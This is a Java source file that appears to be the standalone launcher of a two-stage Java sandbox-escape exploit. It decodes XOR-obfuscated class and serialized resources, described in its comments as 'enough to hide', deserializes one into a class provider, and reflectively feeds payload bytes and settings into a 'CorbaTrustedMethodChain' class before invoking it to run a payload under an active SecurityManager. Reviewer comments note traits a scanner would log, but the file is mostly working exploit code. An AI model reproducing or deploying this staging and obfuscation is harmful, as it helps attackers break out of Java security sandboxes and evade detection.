twostage/src-exploit/x/StandaloneStarter.java
package x;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectInputStream;
/**
 * Standalone (non-applet) launcher for the two-stage demonstration.
 *
 * <p>{@code main} first confirms that a {@code SecurityManager} is installed, then
 * unpacks three obfuscated resources bundled next to {@code XAppletW}, deserializes one
 * of them into an {@code EC} instance, and uses that instance to obtain
 * {@code x.CorbaTrustedMethodChain}, whose static fields are filled in by reflection
 * before its static {@code go()} is invoked.
 *
 * <p>Reviewer notes for anyone analysing a build of this class: every bundled resource
 * is stored with all bits inverted (XOR 0xFF) and decoded in memory only; the
 * {@code classes.ser} resource is fed straight into {@code ObjectInputStream.readObject};
 * the final hand-off is a reflective static-field write plus {@code Method.invoke} on a
 * class that is never referenced by name at compile time. Those four traits are the
 * observable behaviour of this launcher and are what a scanner or sandbox would log.
 */
public class StandaloneStarter {
    // NOTE(review): neither static field is assigned anywhere in this file - main() declares
    // same-named locals that shadow them (see below), so both stay null here. Whether any
    // other class reads them cannot be told from this file.
    public static byte[] payloadRunnerClassBytes;
    public static byte[] privilegedURLClassLoaderClassBytes;

    /**
     * Entry point. Expects the JVM to have been started with a security manager; prints a
     * hint and exits otherwise. All failures in the staging sequence are caught at the end
     * and only printed.
     *
     * @param args unused
     * @throws Exception declared but effectively never thrown: the body catches
     *     {@code Exception} and prints the stack trace
     */
    public static void main(String[] args) throws Exception {
        // Probe for a SecurityManager: clearing it succeeds only when none is installed,
        // in which case the demonstration is pointless, so bail out. With a manager in
        // place the call throws SecurityException, which is the expected path.
        try {
            System.setSecurityManager(null);
            System.err.println("Please start with JVM parameters: -Djava.security.manager");
            System.err.println("Else running this demonstration makes no sense.");
            return;
        } catch( SecurityException ex ) {
            // We expect this
        }
        // Static configuration held in EP (defined elsewhere); pArgs and pBin are also read
        // from EP further down but are not set here.
        EP.docBase = "demomode";
        EP.pJar = "payload.jar";
        EP.pClass = "payload.DemoPayload";
        // Starting exploit
        try {
            // Stage 0: read the bundled "classes.ser" resource completely (this is the only
            // stream in this method that is explicitly closed), undo the bit inversion, and
            // deserialize it. The result is cast to EC, a project type that is later used as
            // a class provider via getClass(String) - presumably a serializable loader of some
            // kind, but that cannot be confirmed from this file.
            byte[] bytes = new byte[4096];
            InputStream in = XAppletW.class.getResourceAsStream("classes.ser");
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            int bytesRead;
            while( (bytesRead = in.read(bytes)) != -1) {
                out.write(bytes, 0, bytesRead);
            }
            in.close();
            bytes = out.toByteArray();
            for( int i=0; i<bytes.length; i++ ) {
                bytes[i] = (byte) (bytes[i] ^ 255); // "Inverse bits encryption": Enough to hide
            }
            // Native Java deserialization of a blob shipped inside the archive: the
            // deserialized object graph, not this source file, decides what EC really is.
            ByteArrayInputStream bin = new ByteArrayInputStream(bytes);
            ObjectInputStream oin = new ObjectInputStream(bin);
            EC cl = (EC) oin.readObject();
            //-------------------
            // Stage 1: class bytes for PayloadRunner. The obfuscated copy "/x/pr" is preferred;
            // when it is absent (development build) the plain .class file is used and no
            // decoding is applied. Each of the three resource reads below is a single
            // read() into a 100000-byte buffer; the whole buffer, not just the bytes read,
            // is XOR-decoded, and the stream is left open.
            boolean decodeNeeded = true;
            in = XAppletW.class.getResourceAsStream("/x/pr");
            if( in == null ) {
                in = XAppletW.class.getResourceAsStream("/x/PayloadRunner.class");
                decodeNeeded = false; // Dev mode
            }
            bytes = new byte[100000];
            bytesRead = in.read(bytes);
            if( decodeNeeded ) {
                for( int i=0; i<bytes.length; i++ ) {
                    bytes[i] = (byte) (bytes[i] ^ 255); // Enought to hide
                }
            }
            // Local variable: shadows the static field of the same name declared above.
            byte[] payloadRunnerClassBytes = new byte[bytesRead];
            System.arraycopy(bytes, 0, payloadRunnerClassBytes, 0, bytesRead);
            // Stage 2: class bytes for PrivilegedURLClassLoader, same scheme as stage 1.
            decodeNeeded = true;
            in = XAppletW.class.getResourceAsStream("/x/puc");
            if( in == null ) {
                in = XAppletW.class.getResourceAsStream("/x/PrivilegedURLClassLoader.class");
                decodeNeeded = false; // Dev mode
            }
            bytes = new byte[100000];
            bytesRead = in.read(bytes);
            if( decodeNeeded ) {
                for( int i=0; i<bytes.length; i++ ) {
                    bytes[i] = (byte) (bytes[i] ^ 255); // Enought to hide
                }
            }
            // Local variable: shadows the static field of the same name declared above.
            byte[] privilegedURLClassLoaderClassBytes = new byte[bytesRead];
            System.arraycopy(bytes, 0, privilegedURLClassLoaderClassBytes, 0, bytesRead);
            // Stage 3: a second serialized blob ("/x/bs", or "/x/bytes.ser" in dev mode). It is
            // only copied here; it is not deserialized by this class but handed on as raw bytes.
            decodeNeeded = true;
            in = XAppletW.class.getResourceAsStream("/x/bs");
            if( in == null ) {
                in = XAppletW.class.getResourceAsStream("/x/bytes.ser");
                decodeNeeded = false; // Dev mode
            }
            bytes = new byte[100000];
            bytesRead = in.read(bytes);
            if( decodeNeeded ) {
                for( int i=0; i<bytes.length; i++ ) {
                    bytes[i] = (byte) (bytes[i] ^ 255); // Enought to hide
                }
            }
            byte[] serializedBytes = new byte[bytesRead];
            System.arraycopy(bytes, 0, serializedBytes, 0, bytesRead);
            //-------------------
            // Hand-off. The target class is resolved through the deserialized EC instance
            // rather than Class.forName, so "x.CorbaTrustedMethodChain" appears only as a
            // string. Its public static fields are populated reflectively with the staged
            // bytes and the EP settings, then its static no-arg go() is invoked. What go()
            // does is outside this file.
            Class ctmc = cl.getClass("x.CorbaTrustedMethodChain");
            ctmc.getField("payloadRunnerClassBytes").set(null, payloadRunnerClassBytes);
            ctmc.getField("privilegedURLClassLoaderClassBytes").set(null, privilegedURLClassLoaderClassBytes);
            ctmc.getField("serializedBytes").set(null, serializedBytes);
            ctmc.getField("docBase").set(null, EP.docBase);
            ctmc.getField("pJar").set(null, EP.pJar);
            ctmc.getField("pClass").set(null, EP.pClass);
            ctmc.getField("pArgs").set(null, EP.pArgs);
            ctmc.getField("pBin").set(null, EP.pBin);
            ctmc.getMethod("go", new Class[]{}).invoke(null, new Object[]{});
        } catch (Exception e) {
            // Catch-all: a missing resource (null stream -> NPE), a deserialization failure,
            // or any reflective error ends here and is only reported on stderr.
            e.printStackTrace();
        }
    }
}